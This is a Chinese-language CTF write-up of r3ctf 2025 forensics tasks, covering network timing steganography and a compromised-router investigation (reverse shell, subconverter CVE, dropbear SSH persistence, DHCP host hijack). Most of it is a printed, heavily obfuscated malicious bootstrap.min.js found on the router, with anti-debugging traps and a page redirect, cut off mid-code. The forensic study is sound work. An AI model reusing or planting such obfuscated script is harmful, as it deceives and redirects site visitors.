2025 r3ctf - WriteUp & 复现
碎碎念
第一次参加r3ctf,干的道心破碎了,非常的坐牢,感觉有几题能出的一直没出来,DFIR第二题跟suer做了大半了最后没时间还是没做出来,很可惜。只能说题目强度还是太高了,不过也学到了不少东西,打算后面wp出来后复现一下
Forensics
The R3 Pig Problem
知识点省流
数据传输间隔隐写(这应该放在misc
WP
打开流量包,发现有一大堆tcp协议,追踪一下发现传送了n次数据,每次传一个字符,而且时间间隔不固定
一开始以为是看icmp协议什么的,后面想到时间间隔可能有东西,发现小数点后第一位数字固定为0和1,提取出来然后转ascii值即可
解出来如下:
DFIR 2025 Ⅰ: Lost In Router
知识点省流
还算简单的取证分析(路由器磁盘取证
WP
六个问题
前面的爆破就不说了 gpt随便梭哈
Q1) What is the OS version of the router?
取证大师秒了
Q2) What is the IP address of the attacker's machine?
查看文件的修改时间,在25年7月4号的文件中发现了这么个文件,里面藏了反向shell 带了ip
Q3) What is the CVE number of the vulnerability exploited by the attacker?
Q2的文件放在了subconverter这个目录中 应该是利用了这个程序的cve,直接根据关键词去搜cve然后遍历即可
最后找到了这个
https://feedly.com/cve/CVE-2022-28927
Q4) What program's configuration was modify by the attacker to do persistence?
还是老样子 在7月4号访问的文件中发现了一个authorized_keys 显然是利用它进行了ssh登录 而这个key放在了dropbear中,猜测是利用dropbear来进行登录从而维持反向shell
Q5) What is the host hijacked by the attacker?
还是看7月4号的文件,在dhcp中有被劫持的host
Q6) What host did the attacker use to host malicious artifacts?
又看7月4号的文件,有个bootstrap.min.js
打开看看发现长的怪怪的,正常应该不这样,这明显加密过了
var _0xodc='jsjiami.com.v7';var _0xd285f0=_0x3e3d;(function(_0x3426ed,_0x4f615f,_0x54bdaa,_0x27250e,_0x1045de,_0x4c9f61,_0x1a165d){return _0x3426ed=_0x3426ed>>0x5,_0x4c9f61='hs',_0x1a165d='hs',function(_0x2ecb34,_0x295d17,_0x17e00a,_0x533f29,_0x24ad07){var _0x3f5fc9=_0x3e3d;_0x533f29='tfi',_0x4c9f61=_0x533f29+_0x4c9f61,_0x24ad07='up',_0x1a165d+=_0x24ad07,_0x4c9f61=_0x17e00a(_0x4c9f61),_0x1a165d=_0x17e00a(_0x1a165d),_0x17e00a=0x0;var _0x4cd320=_0x2ecb34();while(!![]&&--_0x27250e+_0x295d17){try{_0x533f29=-parseInt(_0x3f5fc9(0x21d,'9Jzc'))/0x1*(-parseInt(_0x3f5fc9(0x17c,'n*Ts'))/0x2)+-parseInt(_0x3f5fc9(0x18b,')@0Q'))/0x3*(-parseInt(_0x3f5fc9(0x1fe,'^pCC'))/0x4)+parseInt(_0x3f5fc9(0x20d,'0R*f'))/0x5*(parseInt(_0x3f5fc9(0x18c,'*nJ['))/0x6)+-parseInt(_0x3f5fc9(0x1c9,'#c4u'))/0x7+-parseInt(_0x3f5fc9(0x191,'^woW'))/0x8*(-parseInt(_0x3f5fc9(0x193,'L)Lu'))/0x9)+parseInt(_0x3f5fc9(0x22f,'k04G'))/0xa*(-parseInt(_0x3f5fc9(0x18e,'9Jzc'))/0xb)+parseInt(_0x3f5fc9(0x22b,'t!ua'))/0xc*(-parseInt(_0x3f5fc9(0x1a3,'%Ics'))/0xd);}catch(_0x24b8bd){_0x533f29=_0x17e00a;}finally{_0x24ad07=_0x4cd320[_0x4c9f61]();if(_0x3426ed<=_0x27250e)_0x17e00a?_0x1045de?_0x533f29=_0x24ad07:_0x1045de=_0x24ad07:_0x17e00a=_0x24ad07;else{if(_0x17e00a==_0x1045de['replace'](/[dMOqrJCSVtXxKnBPYARFWN=]/g,'')){if(_0x533f29===_0x295d17){_0x4cd320['un'+_0x4c9f61](_0x24ad07);break;}_0x4cd320[_0x1a165d](_0x24ad07);}}}}}(_0x54bdaa,_0x4f615f,function(_0x598acd,_0x2eaaa7,_0x17e1d8,_0x737358,_0x135ee6,_0x5e0f66,_0x505e56){return _0x2eaaa7='\x73\x70\x6c\x69\x74',_0x598acd=arguments[0x0],_0x598acd=_0x598acd[_0x2eaaa7](''),_0x17e1d8='\x72\x65\x76\x65\x72\x73\x65',_0x598acd=_0x598acd[_0x17e1d8]('\x76'),_0x737358='\x6a\x6f\x69\x6e',(0x1af409,_0x598acd[_0x737358](''));});}(0x1800,0x7797e,_0xfa7e,0xc2),_0xfa7e)&&(_0xodc=0x13a5);function _0xfa7e(){var _0x5a3ebc=(function(){return[_0xodc,'RrWYjPYsVnjKiBatAmOSxiX.cVMoNFmCRO.dqJv7==','W43dMWpcLSkd','jCk6W7rntW','W77cKwnwW7/dHq','W5JdOGddVmoe','pCoAW57dSW','BhVdGSoBcG','wKVdGSo8','WOtcGdmtWP9aaG','o8oJWO4WWQNdKtFdLKC','pJukd8oW','C01Yhmoz','W6DJWRdcT8kP','kfhdKMvw','zbdcVhRcUa','W5T/WOb9aq','W4TvmConf03dUKddVG4Y','bSk6bWrV','WQ12rmoNqSo4kmoDfCoOnq','WRuhW7lcL8oQ','W40VW5z4W7q','WOWDWR7cGSoc','WO/cVsVcObfkkLldMSo4W49iWQng','AwpdTCoGfW','CSoTdsHY','WQGzxCkOWPa','wthcOsuBh1RcJmo8AYKmWPW','WPCgWOhcSmoZ','vmoCqmkmy8kNbCozWRa','hCoDWPrwAq','hmo/eMqZ','FmkzCXXL','W4ddLsjfdq','EgBdN8odtSojD8oskSoZtsVdHcaUW74KW4W','W77cM25qW7/dHmoNW7C','W4rUwCkz','WOuOdG','WRaCzSkOWPfiW7jQ','eCoshSkepmkVt8ovW6DVrW','hNFdU3Py','uLhdRSowqa','W7XFDmkCFq','W7jLWP3cRSkRW5y','W43dJKRdT3e','W7nDsmokWQa','emoXf2tdNIXiWOT5','EapcPfnF','E2tdICoAEa','f8oSo1W','mZhdM8oTf2u','r3pdHConEq','aZqTe8oD','FuZdTCo2xW','W5f0umkGB1RcOmo9WOxdGCkg','xLtdN8oicG','W5GuW5XuW6q','W7hcM2ncW6tdGCoT','hmoZrvVcQ8k2WOyj','W4ldIJXAg8kmhW','FJfTWPRcVY0','FmkUWPrCCmoXkqW','W65GuCoyWRq','W6WmhSkaga','W4JdNHxcI8k3','W4JcN0f1W7e','W7WOg8k0','W61VWPS','AxHkoCoX','WOqMWQ/cSmoMegK8CW','qSoBqCkBEmk6e8ohW7u5l8kDlSkcW7FcOq','k8odeN0P','vJRcU29Y','xZFcOvK','W4jKWPjsfG','F8kSW5KMo8kADI/dVmk5WOhcRmkD','wGjsWONcRa'].concat((function(){return['pSouW7/dQCopzsa1','W4FdQgxdUKa','W43dN2RdHe4','tf3cOmkDWOO','xCoAmZzFxdS','tsZcOeNcG8onWReAFa','W7bfa8oQW5qsWQXDW65komkfWRe','kJxdQadcNa','W6fCWOXqbq','E2ZdJmoftmon','W7VcMMTE','dqRdGXi','W6HfWRDihW','W5jdgSkZbqqbrN8','WRb9aLSPWQ5uhSkvBv7dV28','W4hdNadcGq','WOFdTqmGWQfwcSkz','W4DEzSksAW','W7usW45vW7K','WRa2WRRcRmkRW7KKnq','tGX3WO3cSY1KW6Gd','qCojWOmXkLaXewyvW7FdGxq','WQ90WQOAWQFcPmowW6TyWOj5obu','ovrEySkd','W7S3W7DbW6RdU8klW7e','W5HimmokdeVdTLpdRW','WOmRD8kJvhhcG8oZ','cxldSwjH','smklE1hcOa','FSkCts95','W6BdNIlcSmkb','uKvBWQ3cSG','W7aBCcXe','nSoxWOTVwq','W6bBWQ5q','agLSDSkx','i8oKhN8Q','WPKjgmork0BdOe4','W49ZWP7cImk5','jSoujxWRt8olpSo6','E2NcLCk7','smo6WQpdQK4','W4vHsSkxvq','EmkmWPtcPCkjnxW7y8kqWRFcUSkr','W6JdVdFdNCo/','sLRcO8k5WQC','W7/cMwnIW5S','WOe2W6/cJ8oD','rmkRC17cVa','W4jFWQLbaG','WOmlW5FcVCoqvG','CNtcMSowm2X/u1a','C3LNWOtcQq','W45Zq8knyxhcSCoowCoLWPxdLHCvjCkroLCHD8ohW6BdVWZdQSk6W5jdkmocACklemoBj1/cJSo0W4NcHSkn','WPC+u8kLWRi','oSkZftq','n8o9WOSdWQW','q8omWOS2ivCZfeCRW4RdPei','E8kgtafJh8kEW44','h8ooW4VdS8oj','W5T1wmk8','oSo9WOn7zG','W6/cNraUWQO','WOeUdSoLkbZdO8o1WOBdN8kXtYe','kmomWO0YWOm','WOikqSkyWOC','x8kYENhcIW','j8khibLi','nSoiWOTKzG','W515vmk2EfW','EmkDtL7cUG','gG3dIrpcGa/cUNLn','aWqKWP/cGmonWQpcVq','ySowWO7dPei','W4ZdIJFdRmoA','r8kYBqaLar3cHSkYsSoVdbS','uCkJFsbVeSkpsmkoW7ZcNCkg'].concat((function(){return['WOOfk8oymW','W7apb8kGW5nDWQ1XWRTDqG','AJ/cUhjS','CmoHWRNdVG','W4hcQcuFWQbNd8kZ','j8oSnM5A','WRaRWP7cO8o4','CapcKgP8amouWQ8GW6iH','jSo/nKHJ','ySorWPJdPKO','FCkvDxhcUG','fCoUo2KWuW','W5dcP0fJW4i','W53cGvXRW4O','WRn5bvyMWQfuxSkQFM/dJLqG','W4hcJM5bW7K','umogWOZdMK4','W5VdHZBdG8oS','tCk6uYDy','W4ldRbzDjq','W4z6xmk/FG','W50RWQddT8oOWPr7sCoSW4SjW7aFF8kqWORdNtGAahpcNMzzW6ddJLbVa8oaW5BcKI5m','WR0FeCkyW5e','d27dUxC','W6PwWRz8kW','A2BdG8oeqmojpa','WPagg8kyW6e','r8keEuhcMq','EInkWR7cVG','qgxdJmoZEW','FgBdVSodxComn8oh','W5JdObfbiG','W4X+y8k4rG','ztXuWOVcRJbLW5a','amoTaw7dIG','W6zorSkEDG','W78XbCk8dq','WPiRwmktWPK','pSojW43dVSoy','vavcWONcPG','hMldOKTd','hCkEW5LIEHa','WQigw8k/WPDiW7nJ','ESkhEXb3h8kEW4ZcOG','W5PpWQrufa','veinWPpcVmoDWQpcVG','a8oZWOz9qG','BNNcKSkMWQq','W6XTWPlcJ8ky','qhzUWQNcRa','W40AW75mW5i','C3lcMmkZt3r8CN9PW5a','nSo2WRKBWQe','AxNdNCoBvG','qgVdN8obca','W54PW7ZcOSoPCmo8','WOSUb8kx','aCo6WOqwWO8','W6CZuGzGW6WpbCku','W5VdVw3dULu','gwJdHgDErqtcUW','ue3dN8oS','ESkQvZWiWPxcRK7cUSk/WPa','W53dOhhdPLmbBqxdVSoYW7q','xSk1B0lcVa','W6jOWP3cTCkM','nSkWWOldOfCkffm','cYCEWOxcVG','hMldO1Pcwa/cRSoSyqO','W7ddSbldUSou','cConWOr4wG','CSoww8kPzW','FhVdJmousG','nCkBW6fGEa','W5hdIXNdICo5vCk7W4y'];}()));}()));}());_0xfa7e=function(){return _0x5a3ebc;};return _0xfa7e();}function _0x3e3d(_0x5285e7,_0x5be9f2){var _0xab7157=_0xfa7e();return _0x3e3d=function(_0x5965d0,_0x3621a7){_0x5965d0=_0x5965d0-0x15e;var _0x3491ac=_0xab7157[_0x5965d0];if(_0x3e3d['jmsCkm']===undefined){var _0x56611b=function(_0x558ee0){var _0xfa7ee6='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x3e3dba='',_0x12ae48='',_0x24be9b=_0x3e3dba+_0x56611b;for(var _0x50c681=0x0,_0x31bf06,_0x20e9eb,_0x3f7091=0x0;_0x20e9eb=_0x558ee0['charAt'](_0x3f7091++);~_0x20e9eb&&(_0x31bf06=_0x50c681%0x4?_0x31bf06*0x40+_0x20e9eb:_0x20e9eb,_0x50c681++%0x4)?_0x3e3dba+=_0x24be9b['charCodeAt'](_0x3f7091+0xa)-0xa!==0x0?String['fromCharCode'](0xff&_0x31bf06>>(-0x2*_0x50c681&0x6)):_0x50c681:0x0){_0x20e9eb=_0xfa7ee6['indexOf'](_0x20e9eb);}for(var _0x18462c=0x0,_0x13b48f=_0x3e3dba['length'];_0x18462c<_0x13b48f;_0x18462c++){_0x12ae48+='%'+('00'+_0x3e3dba['charCodeAt'](_0x18462c)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x12ae48);};var _0x2fc119=function(_0x596c7b,_0x3cd744){var _0x2d7308=[],_0x463a37=0x0,_0x8a0c2a,_0x18a9d1='';_0x596c7b=_0x56611b(_0x596c7b);var _0x1fe17c;for(_0x1fe17c=0x0;_0x1fe17c<0x100;_0x1fe17c++){_0x2d7308[_0x1fe17c]=_0x1fe17c;}for(_0x1fe17c=0x0;_0x1fe17c<0x100;_0x1fe17c++){_0x463a37=(_0x463a37+_0x2d7308[_0x1fe17c]+_0x3cd744['charCodeAt'](_0x1fe17c%_0x3cd744['length']))%0x100,_0x8a0c2a=_0x2d7308[_0x1fe17c],_0x2d7308[_0x1fe17c]=_0x2d7308[_0x463a37],_0x2d7308[_0x463a37]=_0x8a0c2a;}_0x1fe17c=0x0,_0x463a37=0x0;for(var _0x475bc1=0x0;_0x475bc1<_0x596c7b['length'];_0x475bc1++){_0x1fe17c=(_0x1fe17c+0x1)%0x100,_0x463a37=(_0x463a37+_0x2d7308[_0x1fe17c])%0x100,_0x8a0c2a=_0x2d7308[_0x1fe17c],_0x2d7308[_0x1fe17c]=_0x2d7308[_0x463a37],_0x2d7308[_0x463a37]=_0x8a0c2a,_0x18a9d1+=String['fromCharCode'](_0x596c7b['charCodeAt'](_0x475bc1)^_0x2d7308[(_0x2d7308[_0x1fe17c]+_0x2d7308[_0x463a37])%0x100]);}return _0x18a9d1;};_0x3e3d['pNFQCa']=_0x2fc119,_0x5285e7=arguments,_0x3e3d['jmsCkm']=!![];}var _0x5b98d4=_0xab7157[0x0],_0x2d9131=_0x5965d0+_0x5b98d4,_0x42d2a3=_0x5285e7[_0x2d9131];if(!_0x42d2a3){if(_0x3e3d['BZWaZd']===undefined){var _0x3cca57=function(_0x369f12){this['cXGDxs']=_0x369f12,this['zxHkHP']=[0x1,0x0,0x0],this['mZuMuw']=function(){return'newState';},this['uTUqdc']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*',this['sLvGIn']='[\x27|\x22].+[\x27|\x22];?\x20*}';};_0x3cca57['prototype']['DLyhnW']=function(){var _0x437a74=new RegExp(this['uTUqdc']+this['sLvGIn']),_0x3f1682=_0x437a74['test'](this['mZuMuw']['toString']())?--this['zxHkHP'][0x1]:--this['zxHkHP'][0x0];return this['wsMaYx'](_0x3f1682);},_0x3cca57['prototype']['wsMaYx']=function(_0x39fdf9){if(!Boolean(~_0x39fdf9))return _0x39fdf9;return this['towYAF'](this['cXGDxs']);},_0x3cca57['prototype']['towYAF']=function(_0x2fa4db){for(var _0x25af37=0x0,_0xa9f4b9=this['zxHkHP']['length'];_0x25af37<_0xa9f4b9;_0x25af37++){this['zxHkHP']['push'](Math['round'](Math['random']())),_0xa9f4b9=this['zxHkHP']['length'];}return _0x2fa4db(this['zxHkHP'][0x0]);},new _0x3cca57(_0x3e3d)['DLyhnW'](),_0x3e3d['BZWaZd']=!![];}_0x3491ac=_0x3e3d['pNFQCa'](_0x3491ac,_0x3621a7),_0x5285e7[_0x2d9131]=_0x3491ac;}else _0x3491ac=_0x42d2a3;return _0x3491ac;},_0x3e3d(_0x5285e7,_0x5be9f2);};var _0x44e812=(function(){var _0x328a56=_0x3e3d,_0x5ee3ad={'seuXo':function(_0x4287d5,_0x2e834b){return _0x4287d5===_0x2e834b;},'HlaDT':_0x328a56(0x1b9,'wKho'),'rwyZC':function(_0x425ae4,_0x31221d){return _0x425ae4!==_0x31221d;},'MThRY':_0x328a56(0x195,'DGS9'),'smdmW':_0x328a56(0x1a8,'XOSh')},_0x559bc3=!![];return function(_0x2088b0,_0x251a5e){var _0x2534af=_0x328a56;if(_0x5ee3ad[_0x2534af(0x1c0,'[d3G')](_0x5ee3ad[_0x2534af(0x210,'fJhn')],_0x5ee3ad[_0x2534af(0x161,'M9KP')])){var _0x109ccb=_0x559bc3?function(){var _0x419296=_0x2534af;if(_0x251a5e){if(_0x5ee3ad[_0x419296(0x1f3,'k04G')](_0x5ee3ad[_0x419296(0x226,'89TM')],_0x5ee3ad[_0x419296(0x1e8,'M9KP')])){var _0x24e73a=_0x251a5e[_0x419296(0x200,'M9KP')](_0x2088b0,arguments);return _0x251a5e=null,_0x24e73a;}else{if(_0x422687){var _0x279361=_0x45ac25[_0x419296(0x1ef,'JWFg')](_0x4ed402,arguments);return _0x33587a=null,_0x279361;}}}}:function(){};return _0x559bc3=![],_0x109ccb;}else return _0x4c90e9;};}()),_0xbc677b=_0x44e812(this,function(){var _0x72bbb7=_0x3e3d,_0xf0c703={'RJGYg':_0x72bbb7(0x1ca,'UsZi')};return _0xbc677b[_0x72bbb7(0x17e,'wKho')]()[_0x72bbb7(0x187,'M9KP')](_0xf0c703[_0x72bbb7(0x224,'YrGO')])[_0x72bbb7(0x1b8,'cxTW')]()[_0x72bbb7(0x225,'%Ics')](_0xbc677b)[_0x72bbb7(0x23f,'^woW')](_0xf0c703[_0x72bbb7(0x1ff,'ORA9')]);});_0xbc677b();var _0x39207b=(function(){var _0x398c9a=!![];return function(_0x451654,_0x37ac88){var _0x47b594=_0x398c9a?function(){var _0xcfd8c9=_0x3e3d;if(_0x37ac88){var _0x342c11=_0x37ac88[_0xcfd8c9(0x18a,'YrGO')](_0x451654,arguments);return _0x37ac88=null,_0x342c11;}}:function(){};return _0x398c9a=![],_0x47b594;};}());(function(){var _0x4f4a93=_0x3e3d,_0x7bdc9e={'ZZfEx':_0x4f4a93(0x209,'89TM'),'KQUvp':function(_0x15059d,_0xaefea8){return _0x15059d(_0xaefea8);},'ZoKqn':function(_0x1117d3,_0xe8dd7d){return _0x1117d3!==_0xe8dd7d;},'QuRvn':_0x4f4a93(0x1c2,'n*Ts'),'RicVK':_0x4f4a93(0x177,'j^nA'),'ygzog':_0x4f4a93(0x1e0,'^woW'),'QAYxQ':_0x4f4a93(0x1a0,'YrGO'),'fcLka':function(_0x37f050,_0x576e08){return _0x37f050+_0x576e08;},'xrOnO':_0x4f4a93(0x20c,'^woW'),'iQFYs':_0x4f4a93(0x1ae,'[d3G'),'mCrWT':function(_0x3a2a1f,_0x1249e2){return _0x3a2a1f!==_0x1249e2;},'FywDd':_0x4f4a93(0x1e1,'Spg9'),'rPAOT':_0x4f4a93(0x19a,'[d3G'),'yEChV':function(_0x410487,_0x286d8a){return _0x410487===_0x286d8a;},'kpMAb':_0x4f4a93(0x20e,'hNKs'),'yArkc':_0x4f4a93(0x19b,'cxTW'),'sPuQi':function(_0xc53638){return _0xc53638();},'XWbhw':function(_0x229ead,_0x3cac34,_0x1a0641){return _0x229ead(_0x3cac34,_0x1a0641);}};_0x7bdc9e[_0x4f4a93(0x21f,'D]Fd')](_0x39207b,this,function(){var _0x5a6191=_0x4f4a93;if(_0x7bdc9e[_0x5a6191(0x1a2,'UsZi')](_0x7bdc9e[_0x5a6191(0x1d1,'pyi$')],_0x7bdc9e[_0x5a6191(0x16f,'1I)Y')])){var _0x19a0c3=_0x7bdc9e[_0x5a6191(0x1bc,'9Jzc')][_0x5a6191(0x234,'cxTW')]('|'),_0x3d0917=0x0;while(!![]){switch(_0x19a0c3[_0x3d0917++]){case'0':_0x855fd9[_0x5a6191(0x1a5,'UsZi')]=_0x29b145[_0x5a6191(0x173,'JWFg')](_0x577305);continue;case'1':var _0x5cc931=_0xd46565[_0x34b126];continue;case'2':_0x19825e[_0x5cc931]=_0x855fd9;continue;case'3':var _0x13878e=_0x2c50e8[_0x5cc931]||_0x855fd9;continue;case'4':var _0x855fd9=_0x107020[_0x5a6191(0x1d2,'qiA#')][_0x5a6191(0x183,'DRFK')][_0x5a6191(0x162,'#c4u')](_0xe377fc);continue;case'5':_0x855fd9[_0x5a6191(0x23a,'!Qo3')]=_0x13878e[_0x5a6191(0x1cf,'9Jzc')][_0x5a6191(0x1e2,'k04G')](_0x13878e);continue;}break;}}else{var _0x33ba20=new RegExp(_0x7bdc9e[_0x5a6191(0x1d0,'#c4u')]),_0x49b91f=new RegExp(_0x7bdc9e[_0x5a6191(0x17f,'t!ua')],'i'),_0x2acb28=_0x7bdc9e[_0x5a6191(0x17b,'YrGO')](_0x532f55,_0x7bdc9e[_0x5a6191(0x22c,')TRo')]);if(!_0x33ba20[_0x5a6191(0x1b5,'89TM')](_0x7bdc9e[_0x5a6191(0x221,'^woW')](_0x2acb28,_0x7bdc9e[_0x5a6191(0x19d,'7@A8')]))||!_0x49b91f[_0x5a6191(0x1a6,'ypEV')](_0x7bdc9e[_0x5a6191(0x1dc,'fJhn')](_0x2acb28,_0x7bdc9e[_0x5a6191(0x1c1,'89TM')])))_0x7bdc9e[_0x5a6191(0x22a,'pyi$')](_0x7bdc9e[_0x5a6191(0x1bf,'!Qo3')],_0x7bdc9e[_0x5a6191(0x19e,'*nJ[')])?_0x7bdc9e[_0x5a6191(0x1cb,'XS0!')](_0x2acb28,'0'):_0x7bdc9e[_0x5a6191(0x17d,'ScTl')](_0x564ee3,'0');else{if(_0x7bdc9e[_0x5a6191(0x1ea,'nT*h')](_0x7bdc9e[_0x5a6191(0x1e7,'ScTl')],_0x7bdc9e[_0x5a6191(0x1e5,'Spg9')])){var _0x1bdb7c=_0x17fc3c?function(){var _0x2d946d=_0x5a6191;if(_0x2b9458){var _0x1805d6=_0x2ed48d[_0x2d946d(0x235,'nT*h')](_0x12d29f,arguments);return _0x1316a9=null,_0x1805d6;}}:function(){};return _0x30d857=![],_0x1bdb7c;}else _0x7bdc9e[_0x5a6191(0x180,'t!ua')](_0x532f55);}}})();}());var _0xfbbd37=(function(){var _0x239f93=_0x3e3d,_0x556d12={'eQSvR':function(_0x5644b2,_0x259054){return _0x5644b2(_0x259054);},'cIDtQ':function(_0x4eb55e,_0x35ae1e){return _0x4eb55e===_0x35ae1e;},'SAuAj':_0x239f93(0x22e,'!Qo3')},_0x425066=!![];return function(_0x412e50,_0xb0bbc4){var _0x1438ad=_0x239f93;if(_0x556d12[_0x1438ad(0x1de,'nT*h')](_0x556d12[_0x1438ad(0x1b6,'ORA9')],_0x556d12[_0x1438ad(0x232,'n*Ts')])){var _0x52c2ad=_0x425066?function(){var _0x164c1f=_0x1438ad;if(_0xb0bbc4){var _0x17f760=_0xb0bbc4[_0x164c1f(0x200,'M9KP')](_0x412e50,arguments);return _0xb0bbc4=null,_0x17f760;}}:function(){};return _0x425066=![],_0x52c2ad;}else{if(_0x103fdf)return _0x313740;else _0x556d12[_0x1438ad(0x1d4,'0R*f')](_0x10a0cd,0x0);}};}());(function(){var _0x1d2acc=_0x3e3d,_0x475e4b={'RwZLN':function(_0x57ab31,_0x2f1b71){return _0x57ab31!==_0x2f1b71;},'OpGWO':_0x1d2acc(0x1c5,'UpzS'),'WFGJV':function(_0x4e0394,_0xa8f12a){return _0x4e0394===_0xa8f12a;},'uEXAp':_0x1d2acc(0x1c3,'XOSh'),'kPXRA':_0x1d2acc(0x1c6,'hNKs')},_0x1575f1=_0x475e4b[_0x1d2acc(0x175,'bJLI')](typeof window,_0x475e4b[_0x1d2acc(0x19c,'Y0V*')])?window:_0x475e4b[_0x1d2acc(0x217,'L)Lu')](typeof process,_0x475e4b[_0x1d2acc(0x166,'M9KP')])&&_0x475e4b[_0x1d2acc(0x217,'L)Lu')](typeof require,_0x475e4b[_0x1d2acc(0x1a1,'DGS9')])&&_0x475e4b[_0x1d2acc(0x1db,'0R*f')](typeof global,_0x475e4b[_0x1d2acc(0x18f,'XOSh')])?global:this;_0x1575f1[_0x1d2acc(0x20f,'k04G')](_0x532f55,0x7d0);}());var _0x36331c=_0xfbbd37(this,function(){var _0x729cea=_0x3e3d,_0x4c1a13={'VXmOz':function(_0x353634,_0x46fce2){return _0x353634!==_0x46fce2;},'PPvZr':_0x729cea(0x15f,'&hd6'),'BSLRI':function(_0x210f5b,_0x40b792){return _0x210f5b===_0x40b792;},'jAzjQ':_0x729cea(0x16d,'ScTl'),'xKjxZ':function(_0x211bb7,_0x31b990){return _0x211bb7===_0x31b990;},'OuQZA':_0x729cea(0x1f5,'!Qo3'),'CQFRW':_0x729cea(0x174,'^woW'),'hPWwg':_0x729cea(0x21a,'wKho'),'xIsYN':_0x729cea(0x188,'X[kZ'),'etGjw':_0x729cea(0x1ed,'&hd6'),'PXgnL':_0x729cea(0x176,'pyi$'),'TUxMm':_0x729cea(0x1df,'XOSh'),'Kjned':_0x729cea(0x1f1,'wKho'),'HBbif':function(_0xad5d7e,_0x5117f6){return _0xad5d7e<_0x5117f6;},'LHKdz':function(_0x4197e4,_0x5adece){return _0x4197e4===_0x5adece;},'dufqM':_0x729cea(0x1a4,'^woW'),'jyTET':_0x729cea(0x23b,'j^nA')},_0x43befb=_0x4c1a13[_0x729cea(0x1f0,'!Qo3')](typeof window,_0x4c1a13[_0x729cea(0x1d5,'[d3G')])?window:_0x4c1a13[_0x729cea(0x1d7,'X[kZ')](typeof process,_0x4c1a13[_0x729cea(0x1e6,'[d3G')])&&_0x4c1a13[_0x729cea(0x19f,'n*Ts')](typeof require,_0x4c1a13[_0x729cea(0x1d8,'X[kZ')])&&_0x4c1a13[_0x729cea(0x1dd,'cxTW')](typeof global,_0x4c1a13[_0x729cea(0x1fc,'7@A8')])?global:this,_0x2af5ff=_0x43befb[_0x729cea(0x16a,'X[kZ')]=_0x43befb[_0x729cea(0x1e4,'M9KP')]||{},_0x3e4f1c=[_0x4c1a13[_0x729cea(0x181,'ypEV')],_0x4c1a13[_0x729cea(0x190,'[$(S')],_0x4c1a13[_0x729cea(0x201,')TRo')],_0x4c1a13[_0x729cea(0x233,'UsZi')],_0x4c1a13[_0x729cea(0x1fd,'[$(S')],_0x4c1a13[_0x729cea(0x1ee,'XOSh')],_0x4c1a13[_0x729cea(0x1af,'YrGO')]];for(var _0x4363b6=0x0;_0x4c1a13[_0x729cea(0x220,'bJLI')](_0x4363b6,_0x3e4f1c[_0x729cea(0x1d6,'UsZi')]);_0x4363b6++){if(_0x4c1a13[_0x729cea(0x15e,'1I)Y')](_0x4c1a13[_0x729cea(0x216,'Y0V*')],_0x4c1a13[_0x729cea(0x199,'k04G')])){var _0x688669=_0x4c1a13[_0x729cea(0x1eb,'TF@&')][_0x729cea(0x20b,'[d3G')]('|'),_0x3bf394=0x0;while(!![]){switch(_0x688669[_0x3bf394++]){case'0':var _0x5f3232=_0x2af5ff[_0x11d2e7]||_0x2d8b00;continue;case'1':var _0x11d2e7=_0x3e4f1c[_0x4363b6];continue;case'2':_0x2d8b00[_0x729cea(0x207,'k04G')]=_0x5f3232[_0x729cea(0x207,'k04G')][_0x729cea(0x21c,')TRo')](_0x5f3232);continue;case'3':_0x2d8b00[_0x729cea(0x192,'ScTl')]=_0xfbbd37[_0x729cea(0x203,'Spg9')](_0xfbbd37);continue;case'4':_0x2af5ff[_0x11d2e7]=_0x2d8b00;continue;case'5':var _0x2d8b00=_0xfbbd37[_0x729cea(0x167,'XOSh')][_0x729cea(0x197,'%Ics')][_0x729cea(0x238,'TF@&')](_0xfbbd37);continue;}break;}}else debugger;}});_0x36331c();window[_0xd285f0(0x237,'X[kZ')][_0xd285f0(0x208,')TRo')]==_0xd285f0(0x236,'M9KP')&&(window[_0xd285f0(0x215,'fJhn')][_0xd285f0(0x18d,'Y0V*')]=_0xd285f0(0x1b3,'TF@&'));function _0x532f55(_0x3624b3){var _0x33a2cc=_0xd285f0,_0x5a6d64={'Szcpr':function(_0x212048,_0x8c58e2){return _0x212048!==_0x8c58e2;},'SMfyQ':_0x33a2cc(0x1f6,'cxTW'),'EVEvz':function(_0x564997,_0x301cd7){return _0x564997===_0x301cd7;},'OzhzV':_0x33a2cc(0x1f4,'L)Lu'),'PmOZj':_0x33a2cc(0x196,'[$(S'),'sAUbV':_0x33a2cc(0x239,'Spg9'),'GQeoY':_0x33a2cc(0x1ce,'0R*f'),'autiy':_0x33a2cc(0x1ba,'XOSh'),'koZJW':_0x33a2cc(0x206,'t!ua'),'MogjA':_0x33a2cc(0x205,'*nJ['),'qnMDW':_0x33a2cc(0x1bb,'n*Ts'),'nXVUy':_0x33a2cc(0x213,'M9KP'),'LXPmB':function(_0x1d8d12,_0x984c46){return _0x1d8d12<_0x984c46;},'vXMee':_0x33a2cc(0x1cc,'!Qo3'),'ZXCao':function(_0x3720e8){return _0x3720e8();},'YNsGT':_0x33a2cc(0x1e3,'YrGO'),'GgRga':_0x33a2cc(0x163,'^pCC'),'LpspE':function(_0x540feb,_0x53fee1){return _0x540feb+_0x53fee1;},'TYnCL':function(_0x9be2db,_0x35b112){return _0x9be2db/_0x35b112;},'VxtQk':_0x33a2cc(0x1b0,']N9a'),'ZiKMN':function(_0x143459,_0x1a9037){return _0x143459%_0x1a9037;},'eFzTI':_0x33a2cc(0x172,'X[kZ'),'fvsPL':function(_0x432770,_0x86b3c8){return _0x432770!==_0x86b3c8;},'eVEtZ':_0x33a2cc(0x186,'YrGO'),'UXMur':function(_0x5f3d7b,_0x451e91){return _0x5f3d7b(_0x451e91);},'RHGsm':function(_0x3ee6ed,_0x3a7b3d){return _0x3ee6ed!==_0x3a7b3d;},'mmnSP':_0x33a2cc(0x1cd,'qiA#')};function _0x187f4f(_0x236119){var _0x162c23=_0x33a2cc,_0x27ac81={'rMkPl':function(_0x50d27d){var _0x29aea6=_0x3e3d;return _0x5a6d64[_0x29aea6(0x23d,'M9KP')](_0x50d27d);}};if(_0x5a6d64[_0x162c23(0x179,'qiA#')](_0x5a6d64[_0x162c23(0x1b2,'7@A8')],_0x5a6d64[_0x162c23(0x223,'DRFK')])){if(_0x5a6d64[_0x162c23(0x222,'k04G')](typeof _0x236119,_0x5a6d64[_0x162c23(0x214,'L)Lu')])){var _0x6a630d=function(){while(!![]){}};return 